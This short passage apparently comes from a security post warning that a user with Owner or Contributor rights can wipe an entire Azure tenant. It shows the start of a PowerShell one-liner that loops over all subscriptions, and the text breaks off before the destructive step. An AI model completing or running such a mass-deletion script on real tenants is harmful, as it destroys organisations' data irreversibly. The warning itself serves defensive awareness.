Azure Tenant Obliteration

Your entire Azure tenant was just deleted.

A user assigned the Owner or Contributor roles on any or all subscriptions could run the following Powershell one-liner and destroy an entire cloud tenant in seconds, if the tenant owners did not take the necessary precautions.

$subs = Get-AzSubscription
foreach …